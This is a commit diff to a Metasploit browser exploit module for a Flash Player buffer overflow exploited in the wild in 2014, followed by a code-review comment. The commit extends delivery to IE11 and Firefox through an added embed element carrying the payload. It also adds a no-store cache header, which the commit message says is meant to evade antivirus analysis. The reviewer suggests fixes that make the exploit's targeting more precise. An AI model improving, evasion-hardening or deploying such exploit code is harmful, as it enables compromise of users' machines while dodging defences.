Updates to adobe_flash_pixel_bender_bof:
1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method). 2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :). Testing performed: Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.)bug/bundler_fix
parent
a97d9ed54f
commit
033757812d
|
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
|
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
|
||||||
vulnerability occurs in the flash.Display.Shader class, when setting specially
|
vulnerability occurs in the flash.Display.Shader class, when setting specially
|
||||||
crafted data as its bytecode, as exploited in the wild in April 2014. This module
|
crafted data as its bytecode, as exploited in the wild in April 2014. This module
|
||||||
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
|
has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
|
||||||
Windows XP SP3, Windows 7 SP1 and Windows 8.
|
over Windows XP SP3, Windows 7 SP1 and Windows 8.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' =>
|
||||||
{
|
{
|
||||||
:source => /script|headers/i,
|
:source => /script|headers/i,
|
||||||
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
|
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
|
||||||
:method => "LoadMovie",
|
#:method => "LoadMovie",
|
||||||
:os_name => Msf::OperatingSystems::WINDOWS,
|
:os_name => Msf::OperatingSystems::WINDOWS,
|
||||||
:ua_name => Msf::HttpClients::IE,
|
#:ua_name => Msf::HttpClients::IE,
|
||||||
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
|
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if request.uri =~ /\.swf$/
|
if request.uri =~ /\.swf$/
|
||||||
print_status("Sending SWF...")
|
print_status("Sending SWF...")
|
||||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
|
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
<param name="allowScriptAccess" value="always" />
|
<param name="allowScriptAccess" value="always" />
|
||||||
<param name="FlashVars" value="sh=<%=flash_payload%>" />
|
<param name="FlashVars" value="sh=<%=flash_payload%>" />
|
||||||
<param name="Play" value="true" />
|
<param name="Play" value="true" />
|
||||||
|
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
|
||||||
</object>
|
</object>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
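Review bot: The three commented-out entries in the BrowserRequirements hunk (`#:clsid`, `#:method`, `#:ua_name`) leave dead code in the hash instead of removing it; git history already keeps the old values, so either delete the lines or replace them with one comment stating that the `<embed>` delivery path no longer depends on an ActiveX class id or an IE user agent. Dropping `:ua_name` also means the module no longer restricts delivery to IE, while the description in the first hunk still reads `tested successfully on IE 6 to IE 11` — the commit message's observation that Firefox 29 triggers the bug but stays sandboxed belongs in the module description so the metadata matches the actual targeting. The unchanged `:flash` lambda on the following line compares versions as strings (`ver <= '13.0.0.182'`), which would order a build such as `'13.0.0.9'` after `'13.0.0.182'`; `Gem::Version.new(ver) <= Gem::Version.new('13.0.0.182')` gives the intended numeric order. The enclosing hash literal begins and ends outside this hunk.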